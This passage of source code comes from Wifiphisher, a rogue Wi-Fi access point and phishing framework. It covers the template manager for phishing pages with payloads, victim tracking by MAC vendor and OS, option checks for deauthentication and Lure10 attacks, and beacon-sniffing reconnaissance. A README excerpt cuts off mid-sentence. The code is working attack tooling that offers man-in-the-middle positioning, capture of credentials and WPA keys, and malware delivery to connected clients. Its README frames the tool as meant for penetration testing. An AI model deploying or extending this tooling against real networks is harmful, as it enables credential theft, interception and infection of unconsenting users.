"Connected Victims: ", self.blue_text) victims_instance = victim.Victims.get_instance() vict_dic = victims_instance.get_print_representation() row_counter = 8 for key in vict_dic: screen.addstr(row_counter, 0, key, self.red_text) screen.addstr(row_counter, 22, vict_dic[key]) row_counter += 1 # Print the http request section screen.addstr(13, 0, "HTTP requests: ", self.blue_text) if os.path.isfile('/tmp/wifiphisher-webserver.tmp'): http_output = check_output( ['tail', '-5', '/tmp/wifiphisher-webserver.tmp']) self.print_http_requests(screen, 14, http_output) except curses.error: pass # detect if users have pressed the Esc Key if screen.getch() == 27: is_done = True if info.phishinghttp.terminate and info.args.quitonsuccess: is_done = True screen.refresh() return is_done def display_string(w_len, target_line): """ Display the line base on the max length of window length :param w_len: length of window :param target_line: the target display string :type w_len: int :type target_line: str :return: The final displaying string :rtype: str """ return target_line if w_len >= len(target_line) else target_line[:w_len] def line_splitter(num_of_words, line): """ Split line to the shorter lines :param num_of_words: split the line into the line with lenth equeal to num_of_words :type num_of_words: int :param line: A sentence :type line: str :return: tuple of shorter lines :rtype: tuple """ pieces = line.split() return (" ".join(pieces[i:i + num_of_words]) for i in range(0, len(pieces), num_of_words)) File: wifiphisher/common/phishingpage.py """ This module handles all the phishing related operations for Wifiphisher.py """ import os from shutil import copyfile import wifiphisher.common.constants as constants try: from configparser import ConfigParser, RawConfigParser except ImportError: from configparser import ConfigParser, RawConfigParser def config_section_map(config_file, section): """ Map the values of a config file to a dictionary. """ config = ConfigParser() config.read(config_file) dict1 = {} if section not in config.sections(): return dict1 options = config.options(section) for option in options: try: dict1[option] = config.get(section, option) except KeyError: dict1[option] = None return dict1 class InvalidTemplate(Exception): """ Exception class to raise in case of a invalid template """ def __init__(self): Exception.__init__(self, "The given template is either invalid or " + "not available locally!") class PhishingTemplate(object): """ This class represents phishing templates """ def __init__(self, name): """ Construct object. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: None :rtype: None .. todo:: Maybe add a category field """ # setup all the variables config_path = os.path.join(constants.phishing_pages_dir, name, 'config.ini') info = config_section_map(config_path, 'info') self._name = name self._display_name = info['name'] self._description = info['description'] self._payload = False self._config_path = os.path.join(constants.phishing_pages_dir, self._name, 'config.ini') if 'payloadpath' in info: self._payload = info['payloadpath'] self._path = os.path.join(constants.phishing_pages_dir, self._name.lower(), constants.SCENARIO_HTML_DIR) self._path_static = os.path.join(constants.phishing_pages_dir, self._name.lower(), constants.SCENARIO_HTML_DIR, 'static') self._context = config_section_map(config_path, 'context') self._extra_files = [] @staticmethod def update_config_file(payload_filename, config_path): """ Update the configuration file :param self: A PhishingTemplate object :param payload_filename: the filename for the payload :param config_path: the file path for the configuration :type self: PhishingTemplate :type payload_filename: str :type config_path: str :return: None :rtype: None """ original_config = ConfigParser() original_config.read(config_path) # new config file object config = RawConfigParser() # update the info section config.add_section('info') options = original_config.options('info') for option in options: if option != "payloadpath": config.set('info', option, original_config.get('info', option)) else: dirname = os.path.dirname( original_config.get('info', 'payloadpath')) filepath = os.path.join(dirname, payload_filename) config.set('info', option, filepath) # update the context section config.add_section('context') dirname = os.path.dirname( original_config.get('context', 'update_path')) filepath = os.path.join(dirname, payload_filename) config.set('context', 'update_path', filepath) with open(config_path, 'w') as configfile: config.write(configfile) def update_payload_path(self, filename): """ :param self: A PhishingTemplate object :filename: the filename for the payload :type self: PhishingTemplate :type filename: str :return: None :rtype: None """ config_path = self._config_path self.update_config_file(filename, config_path) # update payload attribute info = config_section_map(config_path, 'info') self._payload = False if 'payloadpath' in info: self._payload = info['payloadpath'] self._context = config_section_map(config_path, 'context') self._extra_files = [] def merge_context(self, context): """ Merge dict context with current one In case of confict always keep current values """ context.update(self._context) self._context = context def get_context(self): """ Return the context of the template. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: the context of the template :rtype: dict """ return self._context def get_display_name(self): """ Return the display name of the template. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: the display name of the template :rtype: str """ return self._display_name def get_payload_path(self): """ Return the payload path of the template. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: The path of the template :rtype: bool """ return self._payload def has_payload(self): """ Return whether the template has a payload. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: boolean if it needs payload :rtype: bool """ if self._payload: return True return False def get_description(self): """ Return the description of the template. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: the description of the template :rtype: str """ return self._description def get_path(self): """ Return the path of the template files. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: the path of template files :rtype: str """ return self._path def get_path_static(self): """ Return the path of the static template files. JS, CSS, Image files lie there. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: the path of static template files :rtype: str """ return self._path_static def use_file(self, path): """ Copies a file in the filesystem to the path of the template files. :param self: A PhishingTemplate object :type self: PhishingTemplate :param path: path of the file that is to be copied :type self: str :return: the path of the file under the template files :rtype: str """ if path is not None and os.path.isfile(path): filename = os.path.basename(path) copyfile(path, self.get_path_static() + filename) self._extra_files.append(self.get_path_static() + filename) return filename def remove_extra_files(self): """ Removes extra used files (if any) :param self: A PhishingTemplate object :type self: PhishingTemplate :return: None :rtype: None """ for filename in self._extra_files: if os.path.isfile(filename): os.remove(filename) def __str__(self): """ Return a string representation of the template. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: the name followed by the description of the template :rtype: str """ return self._display_name + "\n\t" + self._description + "\n" class TemplateManager(object): """ This class handles all the template management operations """ def __init__(self, data_pages=None): """ Construct object. :param self: A TemplateManager object :param data_pages: The directory containing the templates :type self: TemplateManager :return: None :rtype: None """ # setup the templates self._template_directory = data_pages or constants.phishing_pages_dir if data_pages: constants.phishing_pages_dir = data_pages page_dirs = os.listdir(self._template_directory) self._templates = {} for page in page_dirs: if os.path.isdir(page) and self.is_valid_template(page)[0]: self._templates[page] = PhishingTemplate(page) # add all the user templates to the database self.add_user_templates() def get_templates(self): """ Return all the available templates. :param self: A TemplateManager object :type self: TemplateManager :return: all the available templates :rtype: dict """ return self._templates def is_valid_template(self, name): """ Validate the template :param self: A TemplateManager object :param name: A directory name :type self: A TemplateManager object :return: tuple of is_valid and output string :rtype: tuple """ html = False dir_path = os.path.join(self._template_directory, name) # check config file... if not "config.ini" in os.listdir(dir_path): return False, "Configuration file not found in: " try: tdir = os.listdir(os.path.join(dir_path, constants.SCENARIO_HTML_DIR)) except OSError: return False, "No " + constants.SCENARIO_HTML_DIR + " directory found in: " # Check HTML files... for tfile in tdir: if tfile.endswith(".html"): html = True break if not html: return False, "No HTML files found in: " # and if we found them all return true and template directory name return True, name def find_user_templates(self): """ Return all the user's templates available. :param self: A TemplateManager object :type self: TemplateManager :return: all the local templates available :rtype: list """ # a list to store file names in local_templates = [] # loop through the directory content for name in os.listdir(self._template_directory): # check to see if it is a directory and not in the database if (os.path.isdir(os.path.join(self._template_directory, name)) and name not in self._templates): # check template is_valid, output = self.is_valid_template(name) # if template successfully validated, then... if is_valid: # just add it to the list local_templates.append(name) else: # TODO: We should throw an exception instead here. # but if not then display which problem occurred print("[" + constants.R + "!" + constants.W + "] " + output + name) return local_templates def add_user_templates(self): """ Add all the user templates to the database. :param self: A TemplateManager object :type: self: TemplateManager :return: None :rtype: None """ # get all the user's templates user_templates = self.find_user_templates() # loop through the templates for template in user_templates: # create a template object and add it to the database local_template = PhishingTemplate(template) self._templates[template] = local_template @property def template_directory(self): return self._template_directory def on_exit(self): """ Delete any extra files on exit :param self: A TemplateManager object :type: self: TemplateManager :return: None :rtype: None """ for templ_obj in list(self._templates.values()): templ_obj.remove_extra_files() File: wifiphisher/common/utilities.py """Host common and generic functions. Host all the common and generic functions that are used throughout the project. """ from __future__ import (absolute_import, division, print_function, unicode_literals) from logging import getLogger from subprocess import PIPE, Popen from wifiphisher.common.constants import DN # pylint: disable=C0103 logger = getLogger(__name__) def execute_commands(commands): """Execute each command and log any errors.""" for command in commands: _, error = Popen(command.split(), stderr=PIPE, stdout=DN).communicate() if error: logger.error( "{command} has failed with the following error:\n{error}". format(command=command, error=error)) File: wifiphisher/common/opmode.py """ All logic regarding the Operation Modes (opmodes). The opmode is defined based on the user's arguments and the available resources of the host system """ import argparse import logging import os import sys import pyric import wifiphisher.common.constants as constants import wifiphisher.common.interfaces as interfaces import wifiphisher.extensions.handshakeverify as handshakeverify logger = logging.getLogger(__name__) class OpMode(object): """ Manager of the operation mode """ def __init__(self): """ Construct the class :param self: An OpMode object :type self: OpMode :return: None :rtype: None """ self.op_mode = 0x0 # True if the system only contains one phy interface # or if the user wants us to use only one phy # e.g. using the --interface option self._use_one_phy = False # The card which supports monitor and ap mode self._perfect_card = None def initialize(self, args): """ Initialize the opmode manager :param self: An OpMode object :param args: An argparse.Namespace object :type self: OpMode :type args: argparse.Namespace :return: None :rtype: None """ self._perfect_card, self._use_one_phy =\ interfaces.is_add_vif_required(args.interface, args.internetinterface, args.wpspbc_assoc_interface) self._check_args(args) def _check_args(self, args): """ Checks the given arguments for logic errors. :param self: An OpMode object :param args: An argparse.Namespace object :type self: OpMode :type args: argparse.Namespace :return: None :rtype: None """ if args.presharedkey and \ (len(args.presharedkey) < 8 or len(args.presharedkey) > 64): sys.exit('[' + constants.R + '-' + constants.W + '] Pre-shared key must be between 8 and 63 printable' 'characters.') if args.handshake_capture and not os.path.isfile( args.handshake_capture): sys.exit('[' + constants.R + '-' + constants.W + '] Handshake capture does not exist.') elif args.handshake_capture and not handshakeverify.\ is_valid_handshake_capture(args.handshake_capture): sys.exit('[' + constants.R + '-' + constants.W + '] Handshake capture does not contain valid handshake') if ((args.extensionsinterface and not args.apinterface) or (not args.extensionsinterface and args.apinterface)) and \ not (args.noextensions and args.apinterface): sys.exit('[' + constants.R + '-' + constants.W + '] --apinterface (-aI) and --extensionsinterface (-eI)' '(or --noextensions (-nE)) are used in conjuction.') if args.noextensions and args.extensionsinterface: sys.exit('[' + constants.R + '-' + constants.W + '] --noextensions (-nE) and --extensionsinterface (-eI)' 'cannot work together.') if args.lure10_exploit and args.noextensions: sys.exit('[' + constants.R + '-' + constants.W + '] --lure10-exploit (-lE) and --noextensions (-eJ)' 'cannot work together.') if args.lure10_exploit and not os.path.isfile(constants.LOCS_DIR + args.lure10_exploit): sys.exit('[' + constants.R + '-' + constants.W + '] Lure10 capture does not exist. Listing directory' 'of captures: ' + str(os.listdir(constants.LOCS_DIR))) if (args.mac_ap_interface and args.no_mac_randomization) or \ (args.mac_extensions_interface and args.no_mac_randomization): sys.exit( '[' + constants.R + '-' + constants.W + '] --no-mac-randomization (-iNM) cannot work together with' '--mac-ap-interface or --mac-extensions-interface (-iDM)') if args.deauth_essid and args.noextensions: sys.exit( '[' + constants.R + '-' + constants.W + '] --deauth-essid (-dE) cannot work together with' '--noextension (-nE)') # if args.deauth_essid is set we need the second card to # do the frequency hopping if args.deauth_essid and self._use_one_phy: print(('[' + constants.R + '!' + constants.W + '] Only one card was found. Wifiphisher will deauth only ' 'on the target AP channel')) # args.wAI should be used with args.wE if args.wpspbc_assoc_interface and not args.wps_pbc: sys.exit( '[' + constants.R + '!' + constants.W + '] --wpspbc-assoc-interface (-wAI) requires --wps-pbc (-wP) option.' ) # if args.logpath is defined args.logging must be set too if args.logpath and not args.logging: sys.exit( '[' + constants.R + '!' + constants.W + '] --logpath (-lP) requires --logging option.' ) # if args.credential_log_path is defined args.logging must be set too if args.credential_log_path and not args.logging: sys.exit( '[' + constants.R + '!' + constants.W + '] --credential-log-path (-cP) requires --logging option.' ) if args.deauth_channels: for channel in args.deauth_channels: if channel > 14 or channel < 0: sys.exit( '[' + constants.R + '!' + constants.W + '] --deauth-channels (-dC) requires channels in range 1-14.' ) # If both args.mitminterface and args.internetinterface are provided, the # former takes precedence and the latter gets overwritten. # We have ensured that if that is the case, then args.mitminterface will be # overwritten with the value of args.internetinterface, whereas if no # args.internetinterface was provided, args.mitminterface will be set to a specific string. if args.mitminterface and args.mitminterface != "handledAsInternetInterface": print(('[' + constants.O + '!' + constants.W + '] Using both --mitminterface (-mI) and --internetinterface (-iI)' ' is redundant. Ignoring --internetinterface (-iI).')) def set_opmode(self, args, network_manager): """ Sets the operation mode. :param self: An OpMode object :param args: An argparse.Namespace object :param network_manager: A NetworkManager object :type self: OpMode :type args: argparse.Namespace :type network_manager: NetworkManager :return: None :rtype: None ..note: An operation mode resembles how the tool will best leverage the given resources. Modes of operation 1) AP and Extensions 0x1 2 cards, 2 interfaces i) AP, ii) EM Channel hopping: Enabled 2) AP, Extensions and Internet 0x2 3 cards, 3 interfaces i) AP, ii) EM iii) Internet Channel hopping: Enabled 3) AP-only and Internet 0x3 2 cards, 2 interfaces i) AP, ii) Internet 4) AP-only 0x4 1 card, 1 interface i) AP 5) AP and Extensions 0x5 1 card, 2 interfaces (1 card w/ vif support AP/Monitor) i) AP, ii) Extensions Channel hopping: Disabled !!Most common mode!! 6) AP and Extensions and Internet 0x6 2 cards, 3 interfaces Channel hopping: Disabled (Internet and 1 card w/ 1 vif support AP/Monitor) i) AP, ii) Extensions, iii) Internet 7) Advanced and WPS association 0x7 3 cards, 3 interfaces i) AP, ii) Extensions (Monitor), iii) Extensions (Managed) 8) Advanced and WPS association w/ 1 vif support AP/Monitor 0x8 2 cards, 3 interfaces i) AP, ii) Extensions (Monitor), iii) Extensions (Managed) """ if not args.internetinterface and not args.noextensions: if not self._use_one_phy: # check if there is WPS association interface if args.wpspbc_assoc_interface: self.op_mode = constants.OP_MODE7 logger.info("Starting OP_MODE7 (0x7)") else: self.op_mode = constants.OP_MODE1 logger.info("Starting OP_MODE1 (0x1)") else: # TODO: We should not add any vifs here. # These should happen after the interface # checks in main engine if self._perfect_card is not None: network_manager.add_virtual_interface(self._perfect_card) # check if there is WPS association interface if args.wpspbc_assoc_interface: self.op_mode = constants.OP_MODE8 logger.info("Starting OP_MODE8 (0x8)") else: self.op_mode = constants.OP_MODE5 logger.info("Starting OP_MODE5 (0x5)") if args.internetinterface and not args.noextensions: if not self._use_one_phy: self.op_mode = constants.OP_MODE2 logger.info("Starting OP_MODE2 (0x2)") else: if self._perfect_card is not None: network_manager.add_virtual_interface(self._perfect_card) self.op_mode = constants.OP_MODE6 logger.info("Starting OP_MODE6 (0x6)") if args.internetinterface and args.noextensions: self.op_mode = constants.OP_MODE3 logger.info("Starting OP_MODE3 (0x3)") if args.noextensions and not args.internetinterface: self.op_mode = constants.OP_MODE4 logger.info("Starting OP_MODE4 (0x4)") def internet_sharing_enabled(self): """ :param self: An OpMode object :type self: OpMode :return: True if we are operating in a mode that shares Internet access. :rtype: bool """ return self.op_mode in [constants.OP_MODE2, constants.OP_MODE3, constants.OP_MODE6] def extensions_enabled(self): """ :param self: An OpModeManager object :type self: OpModeManager :return: True if we are loading extensions :rtype: bool """ return self.op_mode in [ constants.OP_MODE1, constants.OP_MODE2, constants.OP_MODE5, constants.OP_MODE6, constants.OP_MODE7, constants.OP_MODE8 ] def freq_hopping_enabled(self): """ :param self: An OpMode object :type self: OpMode :return: True if we are separating the wireless cards for extensions and launching AP. :rtype: bool ..note: MODE5 and MODE6 only use one card to do deauth and lunch ap so it is not allowed to do frequency hopping. """ return self.op_mode in [ constants.OP_MODE1, constants.OP_MODE2, constants.OP_MODE7 ] def assoc_enabled(self): """ :param self: An OpMode object :type self: OpMode :return: True if we are using managed Extensions(that associate to WLANs) :rtype: bool """ return self.op_mode in [constants.OP_MODE7, constants.OP_MODE8] def validate_ap_interface(interface): """ Validate the given interface :param interface: Name of an interface :type interface: str :return: the ap interface :rtype: str :raises: argparse.ArgumentTypeError in case of invalid interface """ if not(pyric.pyw.iswireless(interface) and \ pyric.pyw.isinterface(interface) and \ interfaces.does_have_mode(interface, "AP")): raise argparse.ArgumentTypeError("Provided interface ({})" " either does not exist or" " does not support AP mode" \ .format(interface)) return interface File: wifiphisher/common/victim.py """Module to keep track the victims connected to the rogue AP.""" import time import wifiphisher.common.constants as constants from wifiphisher.common.macmatcher import MACMatcher as macmatcher class Victim(object): """Resembles a Victim (i.e. a connected device to the rogue AP).""" def __init__(self, vmac_address, ip_address): """Create a Victim object.""" self.vmac_address = vmac_address self.ip_address = ip_address self.os = "" self.vendor = "" self.timestamp = time.time() def associate_victim_mac_to_vendor(self, vmac_address): """Find the victims vendor by its mac address. Receives a victims mac address as input, finds the corresponding vendor by using a macmacther object and then accesses the victim dictionary and changes the vendor for the victim with the corresponding mac address :param self: empty Victim instance :type self: Victim :param vmac_address: mac address of the victim :type vmac_address: str """ macmacther_instance = macmatcher(constants.MAC_PREFIX_FILE) vendor = macmacther_instance.get_vendor_name(vmac_address) victims_instance = Victims.get_instance() if vmac_address in victims_instance.victims_dic: victims_instance.victims_dic[vmac_address].vendor = vendor else: raise Exception("Error: No such mac address exists in dictionary") def assign_ip_to_victim(self, vmac_address, ip_address): """Update the ip address of the victim by mac address.""" victims_instance = Victims.get_instance() if vmac_address in victims_instance.victims_dic: victims_instance.victims_dic[vmac_address].ip_address = ip_address else: raise Exception("Error: No such mac address exists in dictionary") class Victims(): """Singleton class that manages all of the victims.""" # Instance will be stored here. __instance = None @staticmethod def get_instance(): """Return the instance of the class or create new if none exists.""" if Victims.__instance is None: Victims() return Victims.__instance def __init__(self): """Initialize the class.""" if Victims.__instance: raise Exception("Error: Victims class is a singleton!") else: Victims.__instance = self self.victims_dic = {} self.url_file = open(constants.URL_TO_OS_FILE, "r") def add_to_victim_dic(self, victim_obj): """Add new victim to the dictionary.""" self.victims_dic[victim_obj.vmac_address] = victim_obj def get_print_representation(self): """Return dic with five most recent victims in order to be printed. :param self: Victims instance :type self: Victims :rtype str """ mac_timestamp = {} sorted_mac_timestamp = [] most_recent_dic = {} max_victim_counter = 0 for value in list(self.victims_dic.values()): mac_timestamp[value.vmac_address] = value.timestamp sorted_mac_timestamp = sorted(list(mac_timestamp.items()), key=lambda p: float(p[1])) for item in reversed(sorted_mac_timestamp): if max_victim_counter >= 5: return most_recent_dic victim_obj = self.victims_dic[item[0]] victim_value = '\t' + victim_obj.ip_address + '\t' \ + victim_obj.vendor + '\t' + victim_obj.os most_recent_dic[victim_obj.vmac_address] = victim_value max_victim_counter += 1 return most_recent_dic def associate_victim_ip_to_os(self, ip_address, url): """Find and update Victims os based on the url it requests. Receives a victims ip address and request as input, finds the corresponding os by reading the initial requests file and then accesses the victim dictionary and changes the os for the victim with the corresponding ip address. :param self: Victims instance :type self: Victims :param ip_address: ip address of the victim :type ip_address: str :param url: request of the victim :type url: str """ self.url_file.seek(0) for line in self.url_file: line = line.split("|") url_check = line[1].strip() os = line[0].strip() if url_check in url: for key in self.victims_dic: if ip_address == self.victims_dic[key].ip_address: self.victims_dic[key].os = os File: wifiphisher/common/recon.py """Handles all reconnaissance operations.""" from logging import getLogger from threading import Thread from time import sleep, strftime import scapy import scapy.layers.dot11 as dot11 import wifiphisher.common.globals as universal from wifiphisher.common.constants import LOCS_DIR, NON_CLIENT_ADDRESSES from wifiphisher.common.interfaces import NetworkManager LOGGER = getLogger(__name__) class AccessPoint(object): """Represents an access point.""" def __init__(self, ssid, bssid, channel, encryption, capture_file=False): # type: (str, str, str, str, bool) -> None """Initialize class with all the given arguments.""" self.name = ssid self.mac_address = bssid self.channel = channel self.encryption = encryption self.signal_strength = None self.client_count = 0 self._clients = set() if capture_file: with open(capture_file, "a") as _file: _file.write("{bssid} {ssid}\n".format(bssid=bssid, ssid=ssid)) def add_client(self, client): # type: (str) -> None """Add client to access point.""" if client not in self._clients: self._clients.add(client) self.client_count += 1 class AccessPointFinder(object): """Finds all the available access point.""" def __init__(self, ap_interface, network_manager): # type: (str, NetworkManager) -> None """Initialize class with all the given arguments.""" self._interface = ap_interface self.observed_access_points = list() self._capture_file = False self._should_continue = True self._hidden_networks = list() self._sniff_packets_thread = Thread(target=self._sniff_packets) self._channel_hop_thread = Thread(target=self._channel_hop) self._network_manager = network_manager def _process_packets(self, packet): # type: (scapy.layers.RadioTap) -> None """Process a RadioTap packet to find access points.""" # check the type of the packet if packet.haslayer(dot11.Dot11Beacon): # check if the packet has info field to prevent processing # malform beacon if hasattr(packet.payload, 'info'): # if the packet has no info (hidden ap) add MAC address of it # to the list # note \00 used for when ap is hidden and shows only the length # of the name. see issue #506 if not packet.info or b"\00" in packet.info: if packet.addr3 not in self._hidden_networks: self._hidden_networks.append(packet.addr3) # otherwise get it's name and encryption else: self._create_ap_with_info(packet) # if packet is a probe response and it's hidden add the # access point elif packet.haslayer(dot11.Dot11ProbeResp): if packet.addr3 in self._hidden_networks: self._create_ap_with_info(packet) # check to see if it is a client of access points elif packet.haslayer(dot11.Dot11): self._find_clients(packet) def _create_ap_with_info(self, packet): # type: (scapy.layers.RadioTap) -> None """Create and add an access point using the extracted information. Access points which are malformed or not in 2G channel list are excluded. """ elt_section = packet[dot11.Dot11Elt] try: channel = str(ord(packet[dot11.Dot11Elt][2].info)) if int(channel) not in universal.ALL_2G_CHANNELS: return except (TypeError, IndexError): return mac_address = packet.addr3 name = None encryption_type = None non_decodable_name = "<contains non-printable chars>" # find the signal strength rssi = get_rssi(packet.notdecoded) new_signal_strength = calculate_signal_strength(rssi) # get the name of the access point # if the name is no utf8 compatible use pre set name try: name = elt_section.info.decode("utf8") except UnicodeDecodeError: name = non_decodable_name # just update signal strength in case of discovered # access point for access_point in self.observed_access_points: if mac_address == access_point.mac_address: # find the current and calculate the difference current_signal_strength = access_point.signal_strength signal_difference = new_signal_strength - current_signal_strength # update signal strength if difference is greater than 5 if signal_difference > 5: access_point.signal_strength = new_signal_strength return None # get encryption type encryption_type = find_encryption_type(packet) # with all the information gathered create and add the # access point access_point = AccessPoint( name, mac_address, channel, encryption_type, capture_file=self._capture_file) access_point.signal_strength = new_signal_strength self.observed_access_points.append(access_point) def _sniff_packets(self): # type: () -> None """Sniff packets one at a time until otherwise set.""" while self._should_continue: dot11.sniff( iface=self._interface, prn=self._process_packets, count=1, store=0) def capture_aps(self): """Create Lure10 capture file.""" self._capture_file = "{LOCS_DIR}area_{time}".format( LOCS_DIR=LOCS_DIR, time=strftime("%Y%m%d_%H%M%S")) LOGGER.info("Create lure10-capture file %s", self._capture_file) def find_all_access_points(self): # type: () -> None """Find all the visible and hidden access points.""" self._sniff_packets_thread.start() self._channel_hop_thread.start() def stop_finding_access_points(self): # type: () -> None """Stop looking for access points.""" self._should_continue = False wait_time = 10 self._channel_hop_thread.join(wait_time) self._sniff_packets_thread.join(wait_time) def _channel_hop(self): # type: () -> None """Change the interface's channel every three seconds. .. note: The channel range is between 1 to 13 """ # if the stop flag not set, change the channel while self._should_continue: for channel in universal.ALL_2G_CHANNELS: # added this check to reduce shutdown time if self._should_continue: self._network_manager.set_interface_channel( self._interface, channel) sleep(3) else: break def _find_clients(self, packet): # type: (scapy.layers.RadioTap) -> None """Find and add if a client is discovered.""" # find sender and receiver receiver = packet.addr1 sender = packet.addr2 # only continue if both addresses are available if sender and receiver: # find sender and receiver first half of MAC address receiver_identifier = receiver[:8] sender_identifier = sender[:8] else: return None # if a valid address is provided if (receiver_identifier, sender_identifier) not in NON_CLIENT_ADDRESSES: # if discovered access point is either sending or receving # add client if it's mac address is not in the MAC filter for access_point in self.observed_access_points: # get the access point MAC address access_point_mac = access_point.mac_address # in case access point is the reciever # add sender as client if access_point_mac == receiver: access_point.add_client(sender) # in case access point is the sender add reciever # as client elif access_point_mac == sender: access_point.add_client(receiver) def get_sorted_access_points(self): """Return all access points sorted based on signal strength.""" return sorted( self.observed_access_points, key=lambda ap: ap.signal_strength, reverse=True) def get_rssi(non_decoded_packet): # type: (scapy.layers.RadioTap) -> int """Return the rssi value of the packet.""" try: return -(256 - max( ord(non_decoded_packet[-4:-3]), ord(non_decoded_packet[-2:-1]))) except TypeError: return -100 def calculate_signal_strength(rssi): # type: (int) -> int """Calculate the signal strength of access point.""" signal_strength = 0 if rssi >= -50: signal_strength = 100 else: signal_strength = 2 * (rssi + 100) return signal_strength def find_encryption_type(packet): # type: (scapy.layers.RadioTap) -> str """Return the encryption type of the access point. .. note: Possible return values are WPA2, WPA, WEP, OPEN, WPA2/WPS and WPA/WPS """ encryption_info = packet.sprintf("%Dot11Beacon.cap%") elt_section = packet[dot11.Dot11Elt] encryption_type = None found_wps = False # extract information from packet try: while (isinstance(elt_section, dot11.Dot11Elt) or (not encryption_type and not found_wps)): # check if encryption type is WPA2 if elt_section.ID == 48: encryption_type = "WPA2" # check if encryption type is WPA elif (elt_section.ID == 221 and elt_section.info.startswith(b"\x00P\xf2\x01\x01\x00")): encryption_type = "WPA" # check if WPS IE exists if (elt_section.ID == 221 and elt_section.info.startswith(b"\x00P\xf2\x04")): found_wps = True # break down the packet elt_section = elt_section.payload # check to see if encryption type is either WEP or OPEN if not encryption_type: if "privacy" in encryption_info: encryption_type = "WEP" else: encryption_type = "OPEN" # Fixes #1146, #1155 except AttributeError: pass if encryption_type != "WEP" and found_wps: encryption_type += "/WPS" return encryption_type File: docs/conf.py # -*- coding: utf-8 -*- # # Configuration file for the Sphinx documentation builder. # # This file does only contain a selection of the most common options. For a # full list see the documentation: # http://www.sphinx-doc.org/en/stable/config # -- Path setup -------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # # import os # import sys # sys.path.insert(0, os.path.abspath('.')) # -- Project information ----------------------------------------------------- project = 'Wifiphisher' copyright = '2019, George Chatzisofroniou' author = 'George Chatzisofroniou' # The short X.Y version version = '' # The full version, including alpha/beta/rc tags release = '1.4' # -- General configuration --------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.viewcode', ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The master toctree document. master_doc = 'index' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This pattern also affects html_static_path and html_extra_path . exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = 'sphinx_rtd_theme' #html_theme = 'alabaster' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # # html_theme_options = {} # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Custom sidebar templates, must be a dictionary that maps document names # to template names. # # The default sidebars (for documents that don't match any pattern) are # defined by theme itself. Builtin themes are using these templates by # default: ``['localtoc.html', 'relations.html', 'sourcelink.html', # 'searchbox.html']``. # # html_sidebars = {} # -- Options for HTMLHelp output --------------------------------------------- # Output file base name for HTML help builder. htmlhelp_basename = 'Wifiphisherdoc' # -- Options for LaTeX output ------------------------------------------------ latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'Wifiphisher.tex', 'Wifiphisher Documentation', 'George Chatzisofroniou', 'manual'), ] # -- Options for manual page output ------------------------------------------ # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'wifiphisher', 'Wifiphisher Documentation', [author], 1) ] # -- Options for Texinfo output ---------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'Wifiphisher', 'Wifiphisher Documentation', author, 'Wifiphisher', 'One line description of project.', 'Miscellaneous'), ] # -- Extension configuration -------------------------------------------------
[![Build Status](https://travis-ci.org/wifiphisher/wifiphisher.svg?branch=master)](https://travis-ci.org/wifiphisher/wifiphisher) [![Documentation Status](https://readthedocs.org/projects/wifiphisher/badge/?version=latest)](http://wifiphisher.readthedocs.io/en/latest/?badge=latest) ![Python Version](https://img.shields.io/badge/python-3.7-blue.svg) ![License](https://img.shields.io/badge/license-GPL-blue.svg) <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/wifiphisher.png" /></p> ## About <a href="https://wifiphisher.org">Wifiphisher</a> is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks. Wifiphisher can be further used to mount victim-customized web phishing attacks against the connected clients in order to capture credentials (e.g. from third party login pages or WPA/WPA2 Pre-Shared Keys) or infect the victim stations with malwares. Wifiphisher is... * ...powerful. Wifiphisher can run for hours inside a Raspberry Pi device executing all modern Wi-Fi association techniques (including "Evil Twin", "KARMA" and "Known Beacons"). * ...flexible. Supports dozens of arguments and comes with a set of community-driven phishing templates for different deployment scenarios. * ...modular. Users can <a href="http://wifiphisher.readthedocs.io/en/latest/extensions.html">write simple or complicated modules</a> in Python to expand the functionality of the tool or <a href="http://wifiphisher.readthedocs.io/en/latest/custom_phishing_scenario.html">create custom phishing scenarios</a> in order to conduct specific target-oriented attacks. * ...easy to use. Advanced users can utilize the rich set of features that Wifiphisher offers but beginners may start out as simply as "./bin/wifiphisher". The interactive Textual User Interface guides the tester through the build process of the attack. * ...the result of an extensive 